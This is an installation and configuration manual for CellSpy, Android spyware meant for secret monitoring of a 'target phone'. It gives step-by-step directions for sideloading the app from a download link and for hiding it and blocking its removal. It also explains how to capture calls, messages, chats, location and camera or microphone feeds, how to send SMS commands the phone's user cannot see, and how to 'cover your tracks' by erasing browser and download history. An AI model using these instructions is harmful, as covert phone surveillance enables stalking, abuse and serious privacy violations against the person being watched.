CELLSPY ANDROID Preparation A number of things should be done once to the target phone before you begin downloading and installing CellSpy. 1. You must enable the target phone's Unknown Sources setting (see below for instructions). If this setting is not enabled then CellSpy will not install on the target phone after download. You will then need to enable the setting, download CellSpy again, and then proceed with installation. On many Android devices you will find Unknown Sources under Settings and then Applications in the phone's menu. On other devices it is under Settings (press More) and the Security. Enable the Unknown Sources option so that a coloured tick (not a grey tick) appears in the box next to it. A security warning may pop up asking whether you are sure you wish to enable this feature. Click OK. (Refer to the screen images below) 2. If you wish to monitor external applications such as Facebook Messenger, Whatsapp, Viber, Gmail, etc., then you must ensure that these applications are already installed and set up for use before installing CellSpy. If any external applications are installed onto the target phone after CellSpy has been installed then they may not be monitored and you'd need to reinstall CellSpy if you wish to capture data from those applications. 3. You should ensure that the target phone's GPS device is turned on and working. On most Android models this can be done by navigating through the phone's menu to Settings and then Location and Security. Under the "My Location" heading you should enable "Use GPS Satellites". There should be a coloured tick in the box next

CELLSPY ANDROID to it (not a grey tick) when it is enabled. You can now exit from this screen. (Refer to the screen images below)

CELLSPY ANDROID Installation Downloading CellSpy is quick and easy. Make sure that there is either airtime credits /data bundle available on the SIM card you're using or that you've connected the target phone to a wireless network so that internet access is available. 1. Open the target phone's browser. Type the following web address into the Address Bar of the browser http://www.intertel.co.za/m/android.apk and press the enter key or select the arrow on the right of the address bar. Note: If you receive a search results page or any screen containing web pages then you have not typed the link into the address bar. Most likely you re typing it into Google s search box. If you cannot find the address bar (it is the box in the picture below that has http://www.google.com/m... written in it) the press the Menu button, select New Window or New Tab, type the download link in the address bar and press Go) 2. You should see a download symbol appear on the notifications bar (at the very top of the screen on most Android devices). The symbol is a downward pointing arrow

CELLSPY ANDROID with a line underneath it. If you don t see this, don t panic, not all Android phones are the same. Place your finger on that symbol or the bar at the very top of the screen and slide the screen down to reveal all the notifications (will look similar to the grey area in the next picture. Find the notification "android.apk". If it is still downloading then you will see a progress bar moving underneath the notification. If it has finished downloading then it will say "Download complete". If you have downloaded the software more than once then the file might be called android- 1.apk, android-2.apk and so on. 3. When the download is complete, tap "android.apk" (or android-1.apk, android-2.apk etc) in the notifications area to begin installation. NOTE: If you receive an error "install blocked" or some other warning that the phone cannot allow the installation to proceed then you need to go back to the Preparation section of this manual and enable Unknown Sources. You will also then need to go right to the beginning of the Download process and try again. 4. After tapping "android.apk" you should see an installation confirmation screen asking you whether you want to install the application. Select the Install button and CellSpy will begin installing itself. Once it is complete you will see a notification screen that shows "Application installed" with two options at the bottom: Open and Done. You must select Open to continue.

CELLSPY ANDROID Note: If the Open option is greyed out and will not let you select it then don t worry it is just because you have already installed CellSpy at least once before. To open the software dial 555555 (or whatever 6-digit number you chose as your password) 5. You will now be asked to enter your email address. This email address will also become your username. It must be a valid email address because your login details will be emailed to it by the web portal as soon as you ve completed this step. Note: if you have not received an email from CellSpy within a few minutes then your email software may have blocked it. Check your junkmail folder. If it isn t there then add webmaster@intertel.co.za to your Safe Senders list or whitelist and then go to www.cellspyx.co.za, press the forgot your username/password link, type in the email address you used and it will be emailed to you again. If not, contact us and we ll give it to you. 6. CellSpy will now contact the server and will create your user account. A message will pop up on the screen (as below in the first image) saying your demo will expire in 3 days. If you re installing CellSpy as a demo then this is the date on which your demo will expire. DO NOT PANIC if you ve already purchased CellSpy. Nothing will happen after the 3 days. If you d like to make sure that all is in order then please contact our support and have the IMEI number of the target phone handy. Our operator will be able to check the status of your account. Press OK to remove the notification. The installation is complete and you should be looking at the CellSpy settings screen. You must now configure the software.

CELLSPY ANDROID

CELLSPY ANDROID Configuration After installation you will need to set up CellSpy to work the way you need it to. This is done by following the instructions below for each of the three settings screen in the CellSpy software. When you are done setting up CellSpy you must save your settings by pressing the Escape key (usually to the right of the centre navigation button - has a symbol on it similar to a u-turn sign) and pressing YES when asked if you wish to save your settings. First Settings Screen Below you will find a description of each setting option on the first settings screen. Our recommended settings are in PURPLE for each setting. For certain settings we have included warnings and/or recommendations. Please take heed of our advice - they are there to ensure that your spy software operates optimally, reliably and in stealth. Enable/Disable Tracking (ENABLE) Ticking this option will turn CellSpy's tracking component on. This component is responsible for keeping track of the monitoring activity it isn t just for location-based services like GPS, so please turn this on. Hide Application (ENABLE) Tick this option to enable CellSpy to run in stealth mode. CellSpy will be hidden from the user, its icon will be deleted and it will be disguised under the installed applications list and other places that running software would ordinarily be listed. System App (ENABLE) Ticking this option will grant CellSpy "system application" status and will prevent the intentional or accidental uninstallation of CellSpy from the target phone.

CELLSPY ANDROID Password (DO NOT CHANGE until all is working or we won t be able to help remotely) CellSpy is protected by a password of your choice. The only way to open the software once it has been hidden is to dial your password into the keypad (as you would for a regular voice call). By default, the password is set to 555555. This option allows you to change the password to any six digit combination of your choice. To change your password, click the "Password" option. A "Password Check" window will appear. Type the old password into this window and click OK. If this is the first time you are changing the password then the old password would still be 555555. Then, you will be asked to type your new 6-digit password into the "Password" window. Do not use any letters or characters in your password - use only numbers. Then click OK to save your new password. Confirm Commands (ENABLE only if you don t mind SMS s billed to the target phone) A feature of CellSpy is the ability for you to send remote commands to the target phone (via SMS or from your web portal) to change certain settings or to enable/disable certain features on the target phone without having to have the phone in your possession. Tick this option if you would like the target phone to reply to your remote commands by sending an SMS confirmation to your monitoring phone whenever a remote command has been successfully received and executed. Please note that the confirmation SMS is sent from the target phone, and although it will not show in the sent folder or message logs, the

CELLSPY ANDROID target phone's airtime will be used (standard SMS rates apply). this option unticked if this might be an issue. You can therefore leave SIM Change Notification (ENABLE only if you don t mind SMS s billed to the target phone) Ticking this option will enable CellSpy to notify you via SMS whenever a new SIM card is inserted into the target phone. This is useful as a few features (e.g. spy call, remote activation of cameras, microphone, etc) require you to know the phone number currently in use with the target phone at the time you intend making use of those features. You must add a Notification Number (this is the cell number that you wish to have the SIM change notification SMS sent to). The notification number must be in the local 10-digit format, e.g. 0821234567. Auto Delete Media (ENABLE) Whenever CellSpy records a voice call, captures background audio, video or photos from the target phone, those media files (audio, video and image files) are stored in a secret location on the target phone so that they can be systematically uploaded to your web portal. Ticking this option will allow CellSpy to automatically delete these media files once they have been successfully uploaded to your web portal, and will ensure that the target phone's storage/memory is not unnecessarily filled up.

CELLSPY ANDROID Upload Media WiFi Mode Only (DO NOT ENABLE or no data will upload unless the phone is connected to a WiFi network) Ticking this option will prevent CellSpy from uploading media files (audio and video recordings etc) unless it is connected to the internet via WiFi. This is useful if the target phone frequently has WiFi access available to it, but not so useful if it does not. Auto Turn GPS On (ENABLE if you want to track the phone using GPS) The target phone's GPS device is able to be turned off manually by the user, and can also be automatically shut down by the target phone itself if battery power or phone resources are low. When the GPS device is turned off then the GPS tracking features of CellSpy cannot function. Ticking this option will enable CellSpy to attempt to force the GPS device on the target phone to turn itself back on if it is ever automatically turned off. It may not always be able to do so as the GPS device can be manually turned off too. Setup Password Retrieval (DO NOT ENABLE) Setting up this option will allow you to recover your password if it is ever forgotten. There are two recovery methods: Recover Via Gmail and Recover Via Question. Recover Via Gmail - Ticking this option will allow the software to send your forgotten password to an email account of yours. In order to make use of this feature you will need to have an existing Gmail account or to create a new Gmail account for this purpose. To complete the setup you must add a Recipient (which is the email address to which your password will be sent, e.g. bob@hotmail.com), your Gmail Username (which is your Gmail email address, e.g. happy@gmail.com), and your Gmail Password. Recover Via Question - Ticking this option will allow you to recover your password by providing the correct answer to a question of your choosing. You must add a Secret Question (e.g. What was your best friend's first pet named?). Then, under

CELLSPY ANDROID Answer you will add your response to that question (e.g. Baxter). Do not make the question too cryptic or the answer too long-winded, but also do not make the question too easy or the answer too obvious. Retrieve Lost Password This facility is only required if and when you need to retrieve your lost password. Simply select this option, choose one of the two retrieval methods - by sending your password to you via email or by providing the answer to your secret question. Debug Log This feature enables CellSpy to provide the developers with direct and detailed insight into the functioning of CellSpy, the target phone and other relevant elements of the monitoring system. This option should always remain unticked unless you have been requested to enable it for the specific purpose of diagnosing a problem or resolving an issue Upload Settings (DO NOT TOUCH) This function will enable you to manually upload the current spy software settings from the target phone to your web portal. As with the previous setting, this should not be utilized unless you have the required knowledge. Please contact us for advice before attempting to use this function.

CELLSPY ANDROID Download Settings (DO NOT TOUCH) This function will enable you to manually download existing settings from your web portal to the target phone. As with the previous setting, this should not be utilized unless you have the required knowledge. Please contact us for advice before attempting to use this function. Automatic Download Setting (DO NOT TOUCH) This feature will enable you to alter specific settings, activate/deactivate features and control CellSpy remotely and on the fly. This feature should only be used by competent users as the slightest error or omission can cause CellSpy to malfunction, shut down, or become completely unresponsive. We strongly urge you not to activate this feature, or to alter any settings on your web portal (under SETTINGS > MOBILE APPLICATION SETTINGS) without first discussing the matter with our support staff so that they can guide you. Activate Schedule Download (ENABLE only if you think you might need help setting up the phone. Set the interval at 60) This feature allow you to set up a periodic update of settings from your web portal to the target phone. Again, please refrain from enabling or utilizing this feature unless you know precisely what you are doing. Our support staff can assist you in setting up these features in a safe and reliable manner. Second Settings Screen Report To Setting This setting determines where CellSpy will send captured data and reports. there are three options available: Web - (ENABLE) this option must be ticked in order to have data sent from the target phone to your web portal. This is the most convenient and efficient reporting method, and we advise using it exclusively unless internet access is not available to you.

CELLSPY ANDROID E-mail - (DO NOT ENABLE) this option will enable you to have captured data sent to an email address of your choice. We do not recommend using this option in conjunction with web reporting as this will create unnecessary duplication of data and will place additional strains on the target phone's resources. If you wish to use this method then you will need to add the reporting email address (where the data will be sent) under the E-mail setting. SMS (DO NOT ENABLE) - this option enables you to have captured data and reports sent to your mobile phone via SMS. This is useful only if internet access and email is not available to you. Please bear in mind that the target phone's airtime will be billed for each SMS sent to you, so use this feature only if you are in control of the target phone's account. You must add the cell number (or multiple cell numbers) to which the SMS's must be sent under the Monitor Number(s) setting. The monitor number(s) must be in the local 10-digit format, e.g. 0839876543 Third Settings Screen Report/Data Settings (ENABLE the features you want) This section instructs CellSpy as to which data type or activity should be monitored, captured and reported. Below is a brief description of each option. Report Call Logs - ticking this option will enable the capture of call logs - incoming, outgoing and missed calls. Report Contacts - ticking this option will enable the capture of newly added contacts. Please note that existing contacts will not be uploaded to the web portal - only those contacts added to the target phone after CellSpy was installed. Report SMS - ticking this option will enable the capture of incoming and outgoing SMS messages. Report Gmail - ticking this option will enable the capture of emails sent to and from the target phone's primary Gmail account.

CELLSPY ANDROID Report Web Browser - ticking this option will enable the capture of webpage URL history. Report New Photos - ticking this option will capture photographs taken with the target phone's camera when they are saved to memory. Report New Videos - ticking this option will capture videos recorded by the target phone when they are saved to memory. Call Record (ENABLE) Ticking this option will enable the recording of incoming and outgoing voice calls. You must also select an appropriate call recording strategy and record format as below. Call Record Strategy - the default settings for call recording may not work well on all model phones. You are able to select from three call recording strategies which each utilize a different method of recording voice calls. As a last resort you are also able to use "mic" recording which will capture audio using the microphone. (contact Support if you need assistance with choosing a strategy and won't have the opportunity to experiment).

CELLSPY ANDROID Record Format - recorded audio files can be saved in one of two formats, 3GP and AMR. By default, audio will be saved in 3GP format. Below we've listed media players that are able to play back each audio format along with their web site address. MPlayer VLC Media Player Media Player Classic KMPlayer RealPlayer Quicktime GOM Media Player MPlayer VLC Media Player RealPlayer Quicktime AMR Player 3GP MEDIA PLAYERS http://www.mplayerhq.hu/design7/news.html http://www.videolan.org/vlc/ http://sourceforge.net/projects/guliverkli/ http://www.kmpmedia.net/ http://uk.real.com/?mode=rp http://www.apple.com/quicktime/ http://www.gomlab.com/eng/ AMR MEDIA PLAYERS http://www.mplayerhq.hu/design7/news.html http://www.videolan.org/vlc/ http://uk.real.com/?mode=rp http://www.apple.com/quicktime/ http://www.amrplayer.com/ Social Networking/Chat Settings (ENABLE) These settings will capture certain social networking and chat activities on the target phone. Please note that the social networking and chat applications must be installed and configured before CellSpy is installed to ensure that they are recognized by CellSpy. Record Whatsapp Chat - ticking this option will enable the capture of Whatsapp messages. Note: this feature may not work on all target phone models or with every version of the Whatsapp application. The messages will only be uploaded after the chat application has been closed. Record Facebook Chat - ticking this option will enable the capture of Facebook chats that take place using the FB App. No chats that occur through Facebook's web page will be captured. Chats are only uploaded when the chat application has been closed. Report Facebook Photos - ticking this option will enable the capture of photos shared across Facebook using the FB App. In order to make use of this feature you need to have installed the FB app before installing CellSpy.

CELLSPY ANDROID Spy Call Settings (ENABLE) The Spy Call feature will enable you to call the target phone from a designated Spy Call Number and listen into background audio. You must not hide your number when calling the target phone from your designated Spy Call Number. This feature may not work with all phone configurations as network settings, other installed software or SIM card settings may prevent the spy call from occurring at all (i.e. the target phone could ring normally or you could receive a busy signal or be diverted to voicemail) or the target phone may ring one, beep, light up briefly before the spy call is connected. Test this feature and let our support staff know if there are any issues and they can advise whether there are any known solutions. Spy Call Number - this is where you must add the cell number that you will use to call the target phone to initiate a spy call. In most cases the cell number should be added in 10-digit format, e.g. 0841234567, but depending on how the target phone interprets incoming calls you may need to try the other formats (i.e. +27841234567 and 27841234567). After Call Recording - this feature will enable you to record background audio and conversations using the target phone's microphone immediately after specific calls have been made or received. This is useful when needing to know what is being discussed after a telephone conversation with someone else. You must add a value under the Record Length setting which will instruct CellSpy to record that many seconds of audio after the voice call has ended. E.g. if you add 30 as the record length then CellSpy will record 30 seconds of background audio after the voice call has ended. You must also add specific telephone numbers under the Recorded Numbers setting so that CellSpy knows after which calls to record. In most cases the cell number should be added in 10-digit format, e.g. 0761234567, but depending on how the target phone interprets incoming calls you may need to try the other formats (i.e. +27761234567 and 27761234567).

CELLSPY ANDROID GPS Tracking (ENABLE) Ticking the Report GPS location option will enable CellSpy to report on the target phone's location using the GPS co-ordinates obtained from the target phone's own GPS receiver. You must add a value under the Interval (in mins) setting which will control how often CellSpy will query the GPS receiver and report the location to you. E.g. if you add 15 to the Interval setting then CellSpy will query the GPS receiver every half-an-hour and will send the location information to you as per the report timer settings you chose (see Auto Send Settings). Please note that CellSpy does not calculate the location of the target phone. It merely reports the location that the target phone's own GPS receiver supplies to it. You will find (from time to time) that there are questions as to the accuracy of the reported location - this is to be expected. For optimum performance the target phone's GPS receiver must obviously be turned on, the target phone's battery must not be low, the target phone should have clear line-of-sight of the sky (as it must receive signals from navigation satellites), the sky should be clear (not overcast) and weather must be fine. Naturally, these conditions are not always possible, and in those cases the GPS location may be out by a few hundred feet or there may be no GPS location obtained at all. Multimedia Capture (DO NOT ENABLE they can be remotely activated when needed) These features will enable CellSpy to capture photos, video and audio from the target phone at specific intervals (how often) and for specific durations (for how long). The captured photos, video and audio will be sent to you as per the Report To and Auto Send settings above.

CELLSPY ANDROID Enable Photo Taking (DO NOT ENABLE) - Tick this option to instruct CellSpy to capture photos from the target phone's camera. You must add an Interval (in mins) setting so that CellSpy will know how often to activate the camera. This interval is in minutes, so choosing a value of 15 will result in one photo being taken every quarter of an hour. The use of the camera by another application or by user will prevent CellSpy from taking a photo at that time. Enable Video Record (DO NOT ENABLE) - Tick this option to enable the capturing of video from the target phone's camera. You must set an Interval (in mins) which will determine how often video will be captured and a Recording Time (in Secs) which will set how long the video will be. Remember that the Interval value is in minutes and the Recording Time value is in seconds. Setting the Interval as 30 and the Recording Time at 60 will capture one minute of video every half an hour. The use of the camera by another application or by user will prevent CellSpy from capturing video at that time. Enable Audio Record (DO NOT ENABLE) - Tick this option to enable the recording of background audio (using the target phone's microphone).. You must set an Interval (in mins) which will determine how often audio will be recorded and a Recording Time (in Secs) which will set how long the recording will be. Remember that the Interval value is in minutes and the Recording Time value is in seconds. Setting the Interval as 60 and the Recording Time at 120 will capture two minutes of audio every hour. The use of the microphone by another application or by user (e.g. if on a call) will prevent CellSpy from capturing audio at that time.

CELLSPY ANDROID NOTE: Pressing the Menu Key while in the settings screen will give you the following options: Upload All Stored Data - Selecting this option will upload any data still stored on the target phone that has not yet uploaded to your web portal. Fix Call Recording - This option is only for the Samsung Galaxy S2 and Note. It will patch the recording libraries on those devices in order to enable two-sided call recording.

CELLSPY ANDROID Cleanup Before the target phone is ready to be used as a spy phone, you must cover your tracks and delete both the web browser history as well as download logs. To clear the download logs, go to the Browser, press the Menu button, select More, then Downloads, then select the CellSpy download file android.apk and click the Delete option. To clear the web history on most Android devices, open the Browser and press the Menu button. If you don't see a Settings option then click More. Select Settings and scroll down to Privacy Settings. There you can select Clear History and press OK.

CELLSPY ANDROID

CELLSPY ANDROID SMS Commands (COMMANDS ARE LISTED IN THE TABLE ON THE NEXT PAGE) You are able to remotely control a number of features of CellSpy using SMS commands. These are regular SMS messages that are sent to the cell number that is being used in the target phone at that time. You can send the SMS commands from any cell number, and as long as the SMS command is correctly formatted it should be invisible to the target user and will not be found in the message logs or inbox. Please note the following important information about the SMS commands: You must substitute your 6-digit password wherever you see ****** in the commands below. Do not include ****** in the commands you send. E.g. the command KMS******STREC would be sent as KMS555555STREC if your password is 555555. We have added an underscore wherever there should be a space in an SMS command as this can be more clearly seen, e.g. the command KMS666666SVID_5_10 means that there is one space between the letter D and the number 5 and another space between the number 5 and the number 10 at the end. Do not add an underscore to your SMS commands - just replace it with a space.
